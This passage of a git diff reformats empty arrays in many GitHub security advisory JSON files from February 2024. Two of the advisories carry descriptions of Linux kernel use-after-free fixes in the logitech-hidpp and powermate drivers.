+++ b/advisories/unreviewed/2024/02/GHSA-c2qq-2j48-5pr5/GHSA-c2qq-2j48-5pr5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-c467-vf3v-2g2q/GHSA-c467-vf3v-2g2q.json b/advisories/unreviewed/2024/02/GHSA-c467-vf3v-2g2q/GHSA-c467-vf3v-2g2q.json
index ce9026d537a..3f117d64d11 100644
--- a/advisories/unreviewed/2024/02/GHSA-c467-vf3v-2g2q/GHSA-c467-vf3v-2g2q.json
+++ b/advisories/unreviewed/2024/02/GHSA-c467-vf3v-2g2q/GHSA-c467-vf3v-2g2q.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-c48c-24j9-j745/GHSA-c48c-24j9-j745.json b/advisories/unreviewed/2024/02/GHSA-c48c-24j9-j745/GHSA-c48c-24j9-j745.json
index f5741544ba6..3fc1a3b31f8 100644
--- a/advisories/unreviewed/2024/02/GHSA-c48c-24j9-j745/GHSA-c48c-24j9-j745.json
+++ b/advisories/unreviewed/2024/02/GHSA-c48c-24j9-j745/GHSA-c48c-24j9-j745.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-c4c9-rwvw-5wrf/GHSA-c4c9-rwvw-5wrf.json b/advisories/unreviewed/2024/02/GHSA-c4c9-rwvw-5wrf/GHSA-c4c9-rwvw-5wrf.json
index cba09e1c1bd..401a4c2fe7c 100644
--- a/advisories/unreviewed/2024/02/GHSA-c4c9-rwvw-5wrf/GHSA-c4c9-rwvw-5wrf.json
+++ b/advisories/unreviewed/2024/02/GHSA-c4c9-rwvw-5wrf/GHSA-c4c9-rwvw-5wrf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-c5gg-j242-57x6/GHSA-c5gg-j242-57x6.json b/advisories/unreviewed/2024/02/GHSA-c5gg-j242-57x6/GHSA-c5gg-j242-57x6.json
index 0435178796d..c2be2386585 100644
--- a/advisories/unreviewed/2024/02/GHSA-c5gg-j242-57x6/GHSA-c5gg-j242-57x6.json
+++ b/advisories/unreviewed/2024/02/GHSA-c5gg-j242-57x6/GHSA-c5gg-j242-57x6.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-ccpj-xrq2-f4qr/GHSA-ccpj-xrq2-f4qr.json b/advisories/unreviewed/2024/02/GHSA-ccpj-xrq2-f4qr/GHSA-ccpj-xrq2-f4qr.json
index 61129fc204e..5c08f07b659 100644
--- a/advisories/unreviewed/2024/02/GHSA-ccpj-xrq2-f4qr/GHSA-ccpj-xrq2-f4qr.json
+++ b/advisories/unreviewed/2024/02/GHSA-ccpj-xrq2-f4qr/GHSA-ccpj-xrq2-f4qr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-ccq4-9qhm-55xx/GHSA-ccq4-9qhm-55xx.json b/advisories/unreviewed/2024/02/GHSA-ccq4-9qhm-55xx/GHSA-ccq4-9qhm-55xx.json
index a9cf3dd5037..af1c72c4093 100644
--- a/advisories/unreviewed/2024/02/GHSA-ccq4-9qhm-55xx/GHSA-ccq4-9qhm-55xx.json
+++ b/advisories/unreviewed/2024/02/GHSA-ccq4-9qhm-55xx/GHSA-ccq4-9qhm-55xx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-cmph-x6r4-4whr/GHSA-cmph-x6r4-4whr.json b/advisories/unreviewed/2024/02/GHSA-cmph-x6r4-4whr/GHSA-cmph-x6r4-4whr.json
index 42c05b7f5bc..077f6295bbf 100644
--- a/advisories/unreviewed/2024/02/GHSA-cmph-x6r4-4whr/GHSA-cmph-x6r4-4whr.json
+++ b/advisories/unreviewed/2024/02/GHSA-cmph-x6r4-4whr/GHSA-cmph-x6r4-4whr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-cmx3-whxw-v8mp/GHSA-cmx3-whxw-v8mp.json b/advisories/unreviewed/2024/02/GHSA-cmx3-whxw-v8mp/GHSA-cmx3-whxw-v8mp.json
index 3ce3d6bba14..9dc623ea05f 100644
--- a/advisories/unreviewed/2024/02/GHSA-cmx3-whxw-v8mp/GHSA-cmx3-whxw-v8mp.json
+++ b/advisories/unreviewed/2024/02/GHSA-cmx3-whxw-v8mp/GHSA-cmx3-whxw-v8mp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-cr5c-88vg-3gjr/GHSA-cr5c-88vg-3gjr.json b/advisories/unreviewed/2024/02/GHSA-cr5c-88vg-3gjr/GHSA-cr5c-88vg-3gjr.json
index fc9c68c3609..b0a52a48485 100644
--- a/advisories/unreviewed/2024/02/GHSA-cr5c-88vg-3gjr/GHSA-cr5c-88vg-3gjr.json
+++ b/advisories/unreviewed/2024/02/GHSA-cr5c-88vg-3gjr/GHSA-cr5c-88vg-3gjr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-crqv-wqx6-5f5r/GHSA-crqv-wqx6-5f5r.json b/advisories/unreviewed/2024/02/GHSA-crqv-wqx6-5f5r/GHSA-crqv-wqx6-5f5r.json
index c01505ba35a..498f5fc2c24 100644
--- a/advisories/unreviewed/2024/02/GHSA-crqv-wqx6-5f5r/GHSA-crqv-wqx6-5f5r.json
+++ b/advisories/unreviewed/2024/02/GHSA-crqv-wqx6-5f5r/GHSA-crqv-wqx6-5f5r.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-crr8-wrxj-8vg6/GHSA-crr8-wrxj-8vg6.json b/advisories/unreviewed/2024/02/GHSA-crr8-wrxj-8vg6/GHSA-crr8-wrxj-8vg6.json
index 4fe2d83e002..e5be0bd5a95 100644
--- a/advisories/unreviewed/2024/02/GHSA-crr8-wrxj-8vg6/GHSA-crr8-wrxj-8vg6.json
+++ b/advisories/unreviewed/2024/02/GHSA-crr8-wrxj-8vg6/GHSA-crr8-wrxj-8vg6.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-cwpg-8775-j56v/GHSA-cwpg-8775-j56v.json b/advisories/unreviewed/2024/02/GHSA-cwpg-8775-j56v/GHSA-cwpg-8775-j56v.json
index 4a39869ef03..7e5eaffddd8 100644
--- a/advisories/unreviewed/2024/02/GHSA-cwpg-8775-j56v/GHSA-cwpg-8775-j56v.json
+++ b/advisories/unreviewed/2024/02/GHSA-cwpg-8775-j56v/GHSA-cwpg-8775-j56v.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-f3rf-cr7f-cwc4/GHSA-f3rf-cr7f-cwc4.json b/advisories/unreviewed/2024/02/GHSA-f3rf-cr7f-cwc4/GHSA-f3rf-cr7f-cwc4.json
index 19fa996529e..f0f31b45333 100644
--- a/advisories/unreviewed/2024/02/GHSA-f3rf-cr7f-cwc4/GHSA-f3rf-cr7f-cwc4.json
+++ b/advisories/unreviewed/2024/02/GHSA-f3rf-cr7f-cwc4/GHSA-f3rf-cr7f-cwc4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-f3rg-5m66-h824/GHSA-f3rg-5m66-h824.json b/advisories/unreviewed/2024/02/GHSA-f3rg-5m66-h824/GHSA-f3rg-5m66-h824.json
index 95d664b7719..b2d5829da89 100644
--- a/advisories/unreviewed/2024/02/GHSA-f3rg-5m66-h824/GHSA-f3rg-5m66-h824.json
+++ b/advisories/unreviewed/2024/02/GHSA-f3rg-5m66-h824/GHSA-f3rg-5m66-h824.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-f5c4-v2h9-f7mq/GHSA-f5c4-v2h9-f7mq.json b/advisories/unreviewed/2024/02/GHSA-f5c4-v2h9-f7mq/GHSA-f5c4-v2h9-f7mq.json
index aaf83663b48..22d4612472a 100644
--- a/advisories/unreviewed/2024/02/GHSA-f5c4-v2h9-f7mq/GHSA-f5c4-v2h9-f7mq.json
+++ b/advisories/unreviewed/2024/02/GHSA-f5c4-v2h9-f7mq/GHSA-f5c4-v2h9-f7mq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-f7hm-xqp4-h2q8/GHSA-f7hm-xqp4-h2q8.json b/advisories/unreviewed/2024/02/GHSA-f7hm-xqp4-h2q8/GHSA-f7hm-xqp4-h2q8.json
index c766560b82c..93a84241f72 100644
--- a/advisories/unreviewed/2024/02/GHSA-f7hm-xqp4-h2q8/GHSA-f7hm-xqp4-h2q8.json
+++ b/advisories/unreviewed/2024/02/GHSA-f7hm-xqp4-h2q8/GHSA-f7hm-xqp4-h2q8.json
@@ -7,12 +7,8 @@
"CVE-2023-52478"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: logitech-hidpp: Fix kernel crash on receiver USB disconnect\n\nhidpp_connect_event() has *four* time-of-check vs time-of-use (TOCTOU)\nraces when it races with itself.\n\nhidpp_connect_event() primarily runs from a workqueue but it also runs\non probe() and if a \"device-connected\" packet is received by the hw\nwhen the thread running hidpp_connect_event() from probe() is waiting on\nthe hw, then a second thread running hidpp_connect_event() will be\nstarted from the workqueue.\n\nThis opens the following races (note the below code is simplified):\n\n1. Retrieving + printing the protocol (harmless race):\n\n\tif (!hidpp->protocol_major) {\n\t\thidpp_root_get_protocol_version()\n\t\thidpp->protocol_major = response.rap.params[0];\n\t}\n\nWe can actually see this race hit in the dmesg in the abrt output\nattached to rhbz#2227968:\n\n[ 3064.624215] logitech-hidpp-device 0003:046D:4071.0049: HID++ 4.5 device connected.\n[ 3064.658184] logitech-hidpp-device 0003:046D:4071.0049: HID++ 4.5 device connected.\n\nTesting with extra logging added has shown that after this the 2 threads\ntake turn grabbing the hw access mutex (send_mutex) so they ping-pong\nthrough all the other TOCTOU cases managing to hit all of them:\n\n2. Updating the name to the HIDPP name (harmless race):\n\n\tif (hidpp->name == hdev->name) {\n\t\t...\n\t\thidpp->name = new_name;\n\t}\n\n3. Initializing the power_supply class for the battery (problematic!):\n\nhidpp_initialize_battery()\n{\n if (hidpp->battery.ps)\n return 0;\n\n\tprobe_battery(); /* Blocks, threads take turns executing this */\n\n\thidpp->battery.desc.properties =\n\t\tdevm_kmemdup(dev, hidpp_battery_props, cnt, GFP_KERNEL);\n\n\thidpp->battery.ps =\n\t\tdevm_power_supply_register(&hidpp->hid_dev->dev,\n\t\t\t\t\t &hidpp->battery.desc, cfg);\n}\n\n4. Creating delayed input_device (potentially problematic):\n\n\tif (hidpp->delayed_input)\n\t\treturn;\n\n\thidpp->delayed_input = hidpp_allocate_input(hdev);\n\nThe really big problem here is 3. Hitting the race leads to the following\nsequence:\n\n\thidpp->battery.desc.properties =\n\t\tdevm_kmemdup(dev, hidpp_battery_props, cnt, GFP_KERNEL);\n\n\thidpp->battery.ps =\n\t\tdevm_power_supply_register(&hidpp->hid_dev->dev,\n\t\t\t\t\t &hidpp->battery.desc, cfg);\n\n\t...\n\n\thidpp->battery.desc.properties =\n\t\tdevm_kmemdup(dev, hidpp_battery_props, cnt, GFP_KERNEL);\n\n\thidpp->battery.ps =\n\t\tdevm_power_supply_register(&hidpp->hid_dev->dev,\n\t\t\t\t\t &hidpp->battery.desc, cfg);\n\nSo now we have registered 2 power supplies for the same battery,\nwhich looks a bit weird from userspace's pov but this is not even\nthe really big problem.\n\nNotice how:\n\n1. This is all devm-maganaged\n2. The hidpp->battery.desc struct is shared between the 2 power supplies\n3. hidpp->battery.desc.properties points to the result from the second\n devm_kmemdup()\n\nThis causes a use after free scenario on USB disconnect of the receiver:\n1. The last registered power supply class device gets unregistered\n2. The memory from the last devm_kmemdup() call gets freed,\n hidpp->battery.desc.properties now points to freed memory\n3. The first registered power supply class device gets unregistered,\n this involves sending a remove uevent to userspace which invokes\n power_supply_uevent() to fill the uevent data\n4. power_supply_uevent() uses hidpp->battery.desc.properties which\n now points to freed memory leading to backtraces like this one:\n\nSep 22 20:01:35 eric kernel: BUG: unable to handle page fault for address: ffffb2140e017f08\n...\nSep 22 20:01:35 eric kernel: Workqueue: usb_hub_wq hub_event\nSep 22 20:01:35 eric kernel: RIP: 0010:power_supply_uevent+0xee/0x1d0\n...\nSep 22 20:01:35 eric kernel: ? asm_exc_page_fault+0x26/0x30\nSep 22 20:01:35 eric kernel: ? power_supply_uevent+0xee/0x1d0\nSep 22 20:01:35 eric kernel: ? power_supply_uevent+0x10d/0x1d0\nSep 22 20:01:35 eric kernel: dev_uevent+0x10f/0x2d0\nSep 22 20:01:35 eric kernel: kobject_uevent_env+0x291/0x680\nSep 22 20:01:35 eric kernel: \n---truncated---",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -52,9 +48,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-fhq8-7gjm-8jxf/GHSA-fhq8-7gjm-8jxf.json b/advisories/unreviewed/2024/02/GHSA-fhq8-7gjm-8jxf/GHSA-fhq8-7gjm-8jxf.json
index 1a026198c25..222a7564870 100644
--- a/advisories/unreviewed/2024/02/GHSA-fhq8-7gjm-8jxf/GHSA-fhq8-7gjm-8jxf.json
+++ b/advisories/unreviewed/2024/02/GHSA-fhq8-7gjm-8jxf/GHSA-fhq8-7gjm-8jxf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-fmj7-fpwq-79r4/GHSA-fmj7-fpwq-79r4.json b/advisories/unreviewed/2024/02/GHSA-fmj7-fpwq-79r4/GHSA-fmj7-fpwq-79r4.json
index d3719164a87..1629d9efbba 100644
--- a/advisories/unreviewed/2024/02/GHSA-fmj7-fpwq-79r4/GHSA-fmj7-fpwq-79r4.json
+++ b/advisories/unreviewed/2024/02/GHSA-fmj7-fpwq-79r4/GHSA-fmj7-fpwq-79r4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-g386-c6xv-h62r/GHSA-g386-c6xv-h62r.json b/advisories/unreviewed/2024/02/GHSA-g386-c6xv-h62r/GHSA-g386-c6xv-h62r.json
index 36c5c54648a..210d5f6bad1 100644
--- a/advisories/unreviewed/2024/02/GHSA-g386-c6xv-h62r/GHSA-g386-c6xv-h62r.json
+++ b/advisories/unreviewed/2024/02/GHSA-g386-c6xv-h62r/GHSA-g386-c6xv-h62r.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-g568-mc4g-cm6f/GHSA-g568-mc4g-cm6f.json b/advisories/unreviewed/2024/02/GHSA-g568-mc4g-cm6f/GHSA-g568-mc4g-cm6f.json
index cbd2d10c7e8..9b36adb57d5 100644
--- a/advisories/unreviewed/2024/02/GHSA-g568-mc4g-cm6f/GHSA-g568-mc4g-cm6f.json
+++ b/advisories/unreviewed/2024/02/GHSA-g568-mc4g-cm6f/GHSA-g568-mc4g-cm6f.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-g9mh-9w4v-w5v7/GHSA-g9mh-9w4v-w5v7.json b/advisories/unreviewed/2024/02/GHSA-g9mh-9w4v-w5v7/GHSA-g9mh-9w4v-w5v7.json
index 906c0e4f84a..f31de36a712 100644
--- a/advisories/unreviewed/2024/02/GHSA-g9mh-9w4v-w5v7/GHSA-g9mh-9w4v-w5v7.json
+++ b/advisories/unreviewed/2024/02/GHSA-g9mh-9w4v-w5v7/GHSA-g9mh-9w4v-w5v7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-gcc7-m89j-w3pq/GHSA-gcc7-m89j-w3pq.json b/advisories/unreviewed/2024/02/GHSA-gcc7-m89j-w3pq/GHSA-gcc7-m89j-w3pq.json
index d8f2cb63253..e8a8d1f8d31 100644
--- a/advisories/unreviewed/2024/02/GHSA-gcc7-m89j-w3pq/GHSA-gcc7-m89j-w3pq.json
+++ b/advisories/unreviewed/2024/02/GHSA-gcc7-m89j-w3pq/GHSA-gcc7-m89j-w3pq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-gm68-3cj6-qp9p/GHSA-gm68-3cj6-qp9p.json b/advisories/unreviewed/2024/02/GHSA-gm68-3cj6-qp9p/GHSA-gm68-3cj6-qp9p.json
index ac97e8c1861..e7df75ba4b4 100644
--- a/advisories/unreviewed/2024/02/GHSA-gm68-3cj6-qp9p/GHSA-gm68-3cj6-qp9p.json
+++ b/advisories/unreviewed/2024/02/GHSA-gm68-3cj6-qp9p/GHSA-gm68-3cj6-qp9p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-gp9c-7r9h-x95g/GHSA-gp9c-7r9h-x95g.json b/advisories/unreviewed/2024/02/GHSA-gp9c-7r9h-x95g/GHSA-gp9c-7r9h-x95g.json
index c63344c2a99..4013ee4b19e 100644
--- a/advisories/unreviewed/2024/02/GHSA-gp9c-7r9h-x95g/GHSA-gp9c-7r9h-x95g.json
+++ b/advisories/unreviewed/2024/02/GHSA-gp9c-7r9h-x95g/GHSA-gp9c-7r9h-x95g.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-h9g9-92v6-jw8x/GHSA-h9g9-92v6-jw8x.json b/advisories/unreviewed/2024/02/GHSA-h9g9-92v6-jw8x/GHSA-h9g9-92v6-jw8x.json
index 647e9e56963..f26d9f981bf 100644
--- a/advisories/unreviewed/2024/02/GHSA-h9g9-92v6-jw8x/GHSA-h9g9-92v6-jw8x.json
+++ b/advisories/unreviewed/2024/02/GHSA-h9g9-92v6-jw8x/GHSA-h9g9-92v6-jw8x.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-hh96-8ff8-hwhp/GHSA-hh96-8ff8-hwhp.json b/advisories/unreviewed/2024/02/GHSA-hh96-8ff8-hwhp/GHSA-hh96-8ff8-hwhp.json
index 4162d4bb830..956b5045754 100644
--- a/advisories/unreviewed/2024/02/GHSA-hh96-8ff8-hwhp/GHSA-hh96-8ff8-hwhp.json
+++ b/advisories/unreviewed/2024/02/GHSA-hh96-8ff8-hwhp/GHSA-hh96-8ff8-hwhp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-hmgm-p594-v4hg/GHSA-hmgm-p594-v4hg.json b/advisories/unreviewed/2024/02/GHSA-hmgm-p594-v4hg/GHSA-hmgm-p594-v4hg.json
index 5f7fa7d11ef..7e4b0196221 100644
--- a/advisories/unreviewed/2024/02/GHSA-hmgm-p594-v4hg/GHSA-hmgm-p594-v4hg.json
+++ b/advisories/unreviewed/2024/02/GHSA-hmgm-p594-v4hg/GHSA-hmgm-p594-v4hg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-hpjc-53pc-jh5v/GHSA-hpjc-53pc-jh5v.json b/advisories/unreviewed/2024/02/GHSA-hpjc-53pc-jh5v/GHSA-hpjc-53pc-jh5v.json
index d38a3c50463..bc0d120bd50 100644
--- a/advisories/unreviewed/2024/02/GHSA-hpjc-53pc-jh5v/GHSA-hpjc-53pc-jh5v.json
+++ b/advisories/unreviewed/2024/02/GHSA-hpjc-53pc-jh5v/GHSA-hpjc-53pc-jh5v.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-hqp2-6j35-rqp5/GHSA-hqp2-6j35-rqp5.json b/advisories/unreviewed/2024/02/GHSA-hqp2-6j35-rqp5/GHSA-hqp2-6j35-rqp5.json
index 46b0adbc79d..0d55e84ab05 100644
--- a/advisories/unreviewed/2024/02/GHSA-hqp2-6j35-rqp5/GHSA-hqp2-6j35-rqp5.json
+++ b/advisories/unreviewed/2024/02/GHSA-hqp2-6j35-rqp5/GHSA-hqp2-6j35-rqp5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-hvff-fx7p-9p3g/GHSA-hvff-fx7p-9p3g.json b/advisories/unreviewed/2024/02/GHSA-hvff-fx7p-9p3g/GHSA-hvff-fx7p-9p3g.json
index 896bde40ad2..c69f061e19d 100644
--- a/advisories/unreviewed/2024/02/GHSA-hvff-fx7p-9p3g/GHSA-hvff-fx7p-9p3g.json
+++ b/advisories/unreviewed/2024/02/GHSA-hvff-fx7p-9p3g/GHSA-hvff-fx7p-9p3g.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-j494-r8wx-qpjr/GHSA-j494-r8wx-qpjr.json b/advisories/unreviewed/2024/02/GHSA-j494-r8wx-qpjr/GHSA-j494-r8wx-qpjr.json
index 3a174beeac5..73a003750a7 100644
--- a/advisories/unreviewed/2024/02/GHSA-j494-r8wx-qpjr/GHSA-j494-r8wx-qpjr.json
+++ b/advisories/unreviewed/2024/02/GHSA-j494-r8wx-qpjr/GHSA-j494-r8wx-qpjr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-j98f-j6g4-3jp3/GHSA-j98f-j6g4-3jp3.json b/advisories/unreviewed/2024/02/GHSA-j98f-j6g4-3jp3/GHSA-j98f-j6g4-3jp3.json
index 6da2fa50f3d..24a6f14f8b9 100644
--- a/advisories/unreviewed/2024/02/GHSA-j98f-j6g4-3jp3/GHSA-j98f-j6g4-3jp3.json
+++ b/advisories/unreviewed/2024/02/GHSA-j98f-j6g4-3jp3/GHSA-j98f-j6g4-3jp3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-jr9w-q6f5-5c6c/GHSA-jr9w-q6f5-5c6c.json b/advisories/unreviewed/2024/02/GHSA-jr9w-q6f5-5c6c/GHSA-jr9w-q6f5-5c6c.json
index 8a9dd0bd9a8..6e5d5ef5645 100644
--- a/advisories/unreviewed/2024/02/GHSA-jr9w-q6f5-5c6c/GHSA-jr9w-q6f5-5c6c.json
+++ b/advisories/unreviewed/2024/02/GHSA-jr9w-q6f5-5c6c/GHSA-jr9w-q6f5-5c6c.json
@@ -7,12 +7,8 @@
"CVE-2023-52475"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: powermate - fix use-after-free in powermate_config_complete\n\nsyzbot has found a use-after-free bug [1] in the powermate driver. This\nhappens when the device is disconnected, which leads to a memory free from\nthe powermate_device struct. When an asynchronous control message\ncompletes after the kfree and its callback is invoked, the lock does not\nexist anymore and hence the bug.\n\nUse usb_kill_urb() on pm->config to cancel any in-progress requests upon\ndevice disconnection.\n\n[1] https://syzkaller.appspot.com/bug?extid=0434ac83f907a1dbdd1e",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
